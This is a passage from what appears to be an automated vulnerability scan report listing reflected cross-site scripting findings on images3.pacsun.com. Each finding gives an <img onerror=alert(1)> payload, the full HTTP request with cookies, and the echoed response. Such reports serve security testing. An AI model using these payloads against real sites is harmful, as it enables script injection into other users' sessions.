Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8684037_sw_003ebf0a<img src=a onerror=alert(1)>215758b8353

3.192. http://images3.pacsun.com/is/image/pacsunproducts/8684037_sw_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_sw_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c was submitted in the REST URL parameter 4. This input was echoed as 279ba<img src=a onerror=alert(1)>f05e9a6a80c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_sw_041279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8684037_sw_041279ba<img src=a onerror=alert(1)>f05e9a6a80c

3.193. http://images3.pacsun.com/is/image/pacsunproducts/8700825_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8700825_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25 was submitted in the REST URL parameter 4. This input was echoed as bc6a6<img src=a onerror=alert(1)>4a4a7d81d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8700825_01bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8700825_01bc6a6<img src=a onerror=alert(1)>4a4a7d81d25

3.194. http://images3.pacsun.com/is/image/pacsunproducts/8705493_01_209 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8705493_01_209

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107 was submitted in the REST URL parameter 4. This input was echoed as bc3da<img src=a onerror=alert(1)>ab65d9a1107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8705493_01_209bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8705493_01_209bc3da<img src=a onerror=alert(1)>ab65d9a1107

3.195. http://images3.pacsun.com/is/image/pacsunproducts/8706152_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8706152_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d was submitted in the REST URL parameter 4. This input was echoed as 432c1<img src=a onerror=alert(1)>8ef55fb9c1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8706152_01432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8706152_01432c1<img src=a onerror=alert(1)>8ef55fb9c1d

3.196. http://images3.pacsun.com/is/image/pacsunproducts/8710600_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8710600_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150 was submitted in the REST URL parameter 4. This input was echoed as 278a0<img src=a onerror=alert(1)>88b38d4e150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8710600_01278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8710600_01278a0<img src=a onerror=alert(1)>88b38d4e150

3.197. http://images3.pacsun.com/is/image/pacsunproducts/8714529_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8714529_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07 was submitted in the REST URL parameter 4. This input was echoed as 1ecaf<img src=a onerror=alert(1)>288b53e1a07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8714529_011ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8714529_011ecaf<img src=a onerror=alert(1)>288b53e1a07

3.198. http://images3.pacsun.com/is/image/pacsunproducts/8728248_01_046 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_01_046

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3 was submitted in the REST URL parameter 4. This input was echoed as 905c2<img src=a onerror=alert(1)>a7b33374ab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_01_046905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8728248_01_046905c2<img src=a onerror=alert(1)>a7b33374ab3

3.199. http://images3.pacsun.com/is/image/pacsunproducts/8728248_sw_010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b was submitted in the REST URL parameter 4. This input was echoed as d1f38<img src=a onerror=alert(1)>0d292e7660b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_sw_010d1f38<img%20src%3da%20onerror%3dalert(1)>0d292e7660b?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8728248_sw_010d1f38<img src=a onerror=alert(1)>0d292e7660b

3.200. http://images3.pacsun.com/is/image/pacsunproducts/8728248_sw_046 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_sw_046

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c was submitted in the REST URL parameter 4. This input was echoed as ca3ba<img src=a onerror=alert(1)>4586f56f06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_sw_046ca3ba<img%20src%3da%20onerror%3dalert(1)>4586f56f06c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8728248_sw_046ca3ba<img src=a onerror=alert(1)>4586f56f06c

3.201. http://images3.pacsun.com/is/image/pacsunproducts/8728396_01_367 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728396_01_367

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c was submitted in the REST URL parameter 4. This input was echoed as f5e01<img src=a onerror=alert(1)>1dcdc06a97c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728396_01_367f5e01<img%20src%3da%20onerror%3dalert(1)>1dcdc06a97c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8728396_01_367f5e01<img src=a onerror=alert(1)>1dcdc06a97c

3.202. http://images3.pacsun.com/is/image/pacsunproducts/8731390_01_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_01_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 744d4<img%20src%3da%20onerror%3dalert(1)>006768113df was submitted in the REST URL parameter 4. This input was echoed as 744d4<img src=a onerror=alert(1)>006768113df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_01_004744d4<img%20src%3da%20onerror%3dalert(1)>006768113df?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8731390_01_004744d4<img src=a onerror=alert(1)>006768113df

3.203. http://images3.pacsun.com/is/image/pacsunproducts/8731390_sw_004 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_sw_004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f was submitted in the REST URL parameter 4. This input was echoed as a27e4<img src=a onerror=alert(1)>0524341e47f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_sw_004a27e4<img%20src%3da%20onerror%3dalert(1)>0524341e47f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
